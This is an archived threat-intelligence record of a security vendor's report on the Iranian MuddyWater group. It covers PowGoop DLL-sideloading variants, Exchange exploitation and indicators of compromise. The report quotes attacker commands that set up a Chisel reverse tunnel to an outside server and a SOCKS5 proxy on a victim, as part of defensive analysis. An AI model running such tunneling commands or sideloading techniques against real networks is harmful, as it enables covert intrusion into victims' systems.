{ "id": "f8e3ac04-4c5f-430e-96d1-1d7f285cdad9", "created_at": "2026-04-06T00:22:07.110019Z", "updated_at": "2026-04-10T13:11:38.026254Z", "deleted_at": null, "sha1_hash": "d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32", "title": "Wading Through Muddy Waters | Recent Activity of an Iranian State-Sponsored Threat Actor", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1145569, "plain_text": "Wading Through Muddy Waters | Recent Activity of an Iranian\r\nState-Sponsored Threat Actor\r\nBy Amitai Ben Shushan Ehrlich\r\nPublished: 2022-01-12 · Archived: 2026-04-05 14:40:47 UTC\r\nOverview\r\nMuddyWater is commonly considered an Iranian state-sponsored threat actor but no further granularity has\r\npreviously been available. As of January 12th, 2022, U.S. CyberCommand has attributed this activity to the\r\nIranian Ministry of Intelligence (MOIS). While some cases allow for attribution hunches, or even fleshed out\r\nconnections to handles and online personas, attribution to a particular government organization is often reserved to\r\nthe kind of visibility only available to governments with a well-developed all-source and signals intelligence\r\napparatus.\r\nAs in all cases of public government attribution, we take this as an opportunity to reassess our assumptions about\r\na given threat actor all the while recognizing that we can’t independently verify the basis for this claim.\r\nU.S. Cyber Command pointed to multiple malware sets used by MuddyWater. Among those, PowGoop correlates\r\nwith activities we’ve triaged in recent incidents. We hope sharing relevant in-the-wild findings will further bolster\r\nour collective defense against this threat.\r\nAnalysis of New PowGoop Variants\r\nPowGoop is a malware family first described by Palo Alto which utilizes DLL search order hijacking\r\n(T1574.001). The name derives from the usage ‘ GoogleUpdate.exe ‘ to load a malicious modified version of\r\n‘ goopdate.dll ‘, which is used to load a malicious PowerShell script from an external file. Other variants were\r\ndescribed by ClearSkySec and Symantec.\r\nWe identified newer variants of PowGoop loader that involve significant changes, suggesting the group continues\r\nto use and maintain it even after recent exposures. The new variants reveal that the threat group has expanded its\r\narsenal of legitimate software used to load malicious DLLs. Aside from ‘ GoogleUpdate.exe ’, three additional\r\nbenign pieces of software are abused in order to sideload malicious DLLs: ‘ Git.exe ’, ‘ FileSyncConfig.exe ’\r\nand ‘ Inno_Updater.exe ’.\r\nEach contains a modified DLL and a renamed authentic DLL. The hijacked DLL contains imports originating\r\nfrom its renamed counterpart, as well as two additional functions written by the attackers. The list of hijacked\r\nDLLs is presented below:\r\nSoftware Name Hijacked DLL Renamed DLL\r\nGoogleUpdate.exe goopdate.dll goopdate86.dll\r\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nPage 1 of 6\n\ninno_updater.exe vcruntime140.dll vcruntime141.dll\r\nFileSyncConfig.exe vcruntime140.dll vcruntime141.dll\r\ngit.exe libpcre2-8-0.dll libpcre2-8-1.dll\r\nUnlike previous versions, the hijacked DLLs attempt to reflectively load two additional files, one named\r\n‘ Core.dat ’, which is a shellcode called from the export ‘ DllReg ’ and the other named ‘ Dore.dat ’, which is a\r\nPE file with a ` MZRE ` header, allowing it to execute as a shellcode as well, similarly to the publicly reported\r\ntechniques, called from the export ‘ DllRege ’.\r\nThose two ‘ .dat ’ files are identical for each of the hijacked DLLs and are both executed using rundll32 on their\r\nrespective export, which reads the file from disk to a virtually allocated buffer, followed by a call to offset 0 in the\r\nread data.\r\nBoth ‘ Dore.dat ’ and ‘ Core.dat ’ search for a file named ‘config.txt’ and run it using PowerShell in a fashion\r\nsimilar to older versions ( T1059.001 ). The overlap in functionality between the two components is not clear;\r\nhowever, it is evident that ‘ Core.dat ’ represents a more mature and evolved version of PowGoop as it is loaded\r\nas a shellcode, making it less likely to be detected statically.\r\nIt is also worth noting that it is not necessary for both components to reside on the infected system as the malware\r\nwill execute successfully with either one. Given that, it is possible that one or the other could be used as a backup\r\ncomponent. The PowerShell payloads within ‘ config.txt ’ could not be retrieved at the time of writing.\r\nExecution flow of new PowGoop variants\r\nMuddyWater Tunneling Activity\r\nThe operators behind MuddyWater activities are very fond of tunneling tools, as described in several recent blog\r\nposts(T1572). The custom tools used by the group often provide limited functionality, and are used to drop\r\ntunneling tools which enable the operators to conduct a wider set of activities. Among the tunneling tools\r\nMuddyWater attackers were observed using are Chisel, SSF and Ligolo.\r\nThe nature of tunneling activities is often confusing. However, analysis of Chisel executions by MuddyWater\r\noperators on some of the victims helps clarify their usage of such tools. This is an example of a command\r\nexecuted by the attackers on some of the victims:\r\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nPage 2 of 6\n\nSharpChisel.exe client xx.xx.xx.xx:8080 r:8888:127.0.0.1:9999\r\nThe “ r ” flag used in the client execution implies the server is running in “reverse” mode. Setting the --\r\nreverse flag, according to Chisel documentation, “allows clients to specify reverse port forwarding remotes in\r\naddition to normal remotes”.\r\nIn this case, the “ SharpChisel.exe ” client runs on the victim machine, connects back to the Chisel server over\r\nport 8080, and specifies to forward anything coming over port 8888 of the server to port 9999 of the client.\r\nThis might look odd at first sight as port 9999 is not normally used on Windows machines and is not bound to any\r\nspecific service. This is clarified shortly afterwards as the reverse tunnel is followed by setting up a Chisel\r\nSOCKS5 server on the victim, waiting for incoming connections over port 9999:\r\nSharpChisel.exe server -p 9999 --socks5\r\nBy setting up both a server and a client instance of Chisel on the machine, the operators enable themselves to\r\ntunnel a variety of protocols which are supported over SOCKS5. This actually creates a tunnel within a tunnel.\r\nGiven that, it is most likely the operator initiated SOCKS traffic to the server over port 8888, tunneling traffic\r\nfrom applications of interest to inner parts of the network.\r\nThe usage of Chisel and other tunneling tools effectively enable the threat actor to connect to machines within\r\ntarget environments as if they were inside the operator LAN.\r\nSummary of MuddyWater tunneling using Chisel\r\nExchange Exploitation\r\nWhen tracking MuddyWater activity, we came across an interesting subset of activity targeting Exchange servers\r\nof high-profile organizations. This subset of Exchange exploitation activity is rather interesting, as without context\r\nit would be difficult to attribute it to MuddyWater because the activity relies almost completely on publicly\r\navailable offensive security tools.\r\nThe attackers attempt to exploit Exchange servers using two different tools:\r\nA publicly available script for exploiting CVE-2020-0688 (T1190)\r\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nPage 3 of 6\n\nRuler – an open source Exchange exploitation framework\r\nCVE-2020-0688 Exploitation\r\nAnalysis of the activity observed suggests the MuddyWater threat group attempted to exploit CVE-2020-0688 on\r\ngovernmental organizations in the Middle East. The exploit enables remote code execution for an authenticated\r\nuser. The specific exploit MuddyWater operators were attempting to run was utilized to drop a webshell.\r\nThe attempted webshell drop was performed using a set of PowerShell commands that write the webshell content\r\ninto a specific path “ /ecp/HybridLogout.aspx “. The webshell awaits the parameter “ cmd ” and runs the\r\ncommands in it utilizing XSL Script Processing (T1220).\r\nA snippet of the webshell MuddyWater attempted to upload to Exchange servers\r\nThis activity is highly correlated with a CVE-2020-0688 exploitation script from a Github repository named\r\nfuckchina_v2.py. The script utilizes CVE-2020-0688 to upload an ASPX webshell to the path :\r\n“ /ecp/HybridLogout.aspx ” (T1505.003). It is also one of the only publicly available CVE-2020-0688\r\nimplementations that drop a web shell.\r\nA snippet of CVE-2020-0688 exploitation script\r\nRuler Exploitation\r\nAmong other activities performed by the threat actors was attempted Ruler exploitation. The instance identified\r\ntargeted a telecommunication company in the Middle East. The observed activity suggests the threat actor\r\nattempted to create malicious forms, which is one of the most common usages of Ruler (T1137.003).\r\nUsage of Ruler was previously associated with other Iranian threat actors, most commonly with APT33.\r\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nPage 4 of 6\n\nSummary\r\nAnalysis of MuddyWater activity suggests the group continues to evolve and adapt their techniques. While still\r\nrelying on publicly available offensive security tools, the group has been refining its custom toolset and utilizing\r\nnew techniques to avoid detection. This is observed through the three distinct activities observed and analyzed in\r\nthis report: The evolution of the PowGoop malware family, the usage of tunneling tools, and the targeting of\r\nExchange servers in high-profile organizations.\r\nLike many other Iranian threat actors, the group displays less sophistication and technological complexity\r\ncompared to other state-sponsored APT groups. Even so, it appears MuddyWater’s persistency is a key to their\r\nsuccess, and their lack of sophistication does not appear to prevent them from achieving their goals.\r\nIndicators of Compromise\r\nPowGoop variants (MD5, SHA1, SHA256)\r\nGoopdate.dll\r\nA5981C4FA0A3D232CE7F7CE1225D9C7E\r\n8FED2FF6B739C13BADB14C1A884D738C80CB6F34\r\nAA48F06EA8BFEBDC0CACE9EA5A2F9CE00C094CE10DF52462C4B9E87FEFE70F94\r\nLibpcre2-8-0.dll\r\nF8E7FF6895A18CC3D05D024AC7D8BE3E\r\n97248B6E445D38D48334A30A916E7D9DDA33A9B2\r\nF1178846036F903C28B4AB752AFE1B38B531196677400C2250AC23377CF44EC3\r\nVcruntime140.dll\r\nCEC48BCDEDEBC962CE45B63E201C0624\r\n81F46998C92427032378E5DEAD48BDFC9128B225\r\nDD7EE54B12A55BCC67DA4CEAED6E636B7BD30D4DB6F6C594E9510E1E605ADE92\r\nCore.dat\r\nA65696D6B65F7159C9FFCD4119F60195\r\n570F7272412FF8257ED6868D90727A459E3B179E\r\nB5B1E26312E0574464DDEF92C51D5F597E07DBA90617C0528EC9F494AF7E8504\r\nDore.dat\r\n6C084C8F5A61C6BEC5EB5573A2D51FFB\r\n61608ED1DE56D0E4FE6AF07ECBA0BD0A69D825B8\r\n7E7545D14DF7B618B3B1BC24321780C164A0A14D3600DBAC0F91AFBCE1A2F9F4\r\nMITRE ATT\u0026CK\r\nT1190 – Exploit Public-Facing Application\r\nT1572 – Protocol Tunneling\r\nT1574.001 – Hijack Execution Flow: DLL Search Order Hijacking\r\nT1059.001 – Command and Scripting Interpreter: PowerShell\r\nT1505.003 – Server Software Component: Web Shell\r\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nPage 5 of 6\n\nT1220 – XSL Script Processing\r\nSource: https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nhttps://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/\r\nPage 6 of 6", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.sentinelone.com/labs/wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor/" ], "report_names": [ "wading-through-muddy-waters-recent-activity-of-an-iranian-state-sponsored-threat-actor" ], "threat_actors": [ { "id": "a63c994f-d7d6-4850-a881-730635798b90", "created_at": "2025-08-07T02:03:24.788883Z", "updated_at": "2026-04-10T02:00:03.785146Z", "deleted_at": null, "main_name": "COBALT TRINITY", "aliases": [ "APT33 ", "Elfin ", "HOLMIUM ", "MAGNALIUM ", "Peach Sandstorm ", "Refined Kitten ", "TA451 " ], "source_name": "Secureworks:COBALT TRINITY", "tools": [ "AutoCore", "Cadlotcorg", "Dello RAT", "FalseFont", "Imminent Monitor", "KDALogger", "Koadic", "NanoCore", "NetWire", "POWERTON", "PoshC2", "Poylog", "PupyRAT", "Schoolbag" ], "source_id": "Secureworks", "reports": null }, { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "TEMP.Zagros", "Seedworm", "COBALT ULSTER", "G0069", "ATK51", "Mango Sandstorm", "TA450", "Static Kitten", "Boggy Serpens", "Earth Vetala" ], "source_name": "MISPGALAXY:MuddyWater", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e5ff825b-0456-4013-b90a-971b93def74a", "created_at": "2022-10-25T15:50:23.824058Z", "updated_at": "2026-04-10T02:00:05.377261Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "APT33", "HOLMIUM", "Elfin", "Peach Sandstorm" ], "source_name": "MITRE:APT33", "tools": [ "PowerSploit", "AutoIt backdoor", "PoshC2", "Mimikatz", "NanoCore", "DEADWOOD", "StoneDrill", "POWERTON", "LaZagne", "TURNEDUP", "NETWIRE", "Pupy", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "156b3bc5-14b7-48e1-b19d-23aa17492621", "created_at": "2025-08-07T02:03:24.793494Z", "updated_at": "2026-04-10T02:00:03.634641Z", "deleted_at": null, "main_name": "COBALT ULSTER", "aliases": [ "Boggy Serpens ", "ENT-11 ", "Earth Vetala ", "ITG17 ", "MERCURY ", "Mango Sandstorm ", "MuddyWater ", "STAC 1171 ", "Seedworm ", "Static Kitten ", "TA450 ", "TEMP.Zagros ", "UNC3313 ", "Yellow Nix " ], "source_name": "Secureworks:COBALT ULSTER", "tools": [ "CrackMapExec", "Empire", "FORELORD", "Koadic", "LaZagne", "Metasploit", "Mimikatz", "Plink", "PowerStats" ], "source_id": "Secureworks", "reports": null }, { "id": "b23e717c-0b27-47e0-b3c8-4defe6dd857f", "created_at": "2023-01-06T13:46:38.367369Z", "updated_at": "2026-04-10T02:00:02.945356Z", "deleted_at": null, "main_name": "APT33", "aliases": [ "Elfin", "MAGNALLIUM", "HOLMIUM", "COBALT TRINITY", "G0064", "ATK35", "Peach Sandstorm", "TA451", "APT 33", "Refined Kitten" ], "source_name": "MISPGALAXY:APT33", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb", "created_at": "2022-10-25T16:07:23.880522Z", "updated_at": "2026-04-10T02:00:04.775749Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "ATK 51", "Boggy Serpens", "Cobalt Ulster", "G0069", "ITG17", "Mango Sandstorm", "MuddyWater", "Operation BlackWater", "Operation Earth Vetala", "Operation Quicksand", "Seedworm", "Static Kitten", "T-APT-14", "TA450", "TEMP.Zagros", "Yellow Nix" ], "source_name": "ETDA:MuddyWater", "tools": [ "Agentemis", "BugSleep", "CLOUDSTATS", "ChromeCookiesView", "Cobalt Strike", "CobaltStrike", "CrackMapExec", "DCHSpy", "DELPHSTATS", "EmPyre", "EmpireProject", "FruityC2", "Koadic", "LOLBAS", "LOLBins", "LaZagne", "Living off the Land", "MZCookiesView", "Meterpreter", "Mimikatz", "MuddyC2Go", "MuddyRot", "Mudwater", "POWERSTATS", "PRB-Backdoor", "PhonyC2", "PowGoop", "PowerShell Empire", "PowerSploit", "Powermud", "QUADAGENT", "SHARPSTATS", "SSF", "Secure Socket Funneling", "Shootback", "Smbmap", "Valyria", "chrome-passwords", "cobeacon", "prb_backdoor" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434927, "ts_updated_at": 1775826698, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32.pdf", "text": "https://archive.orkl.eu/d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32.txt", "img": "https://archive.orkl.eu/d8423a0dd2d765f1f1b1c71931da6c78d2b3ae32.jpg" } }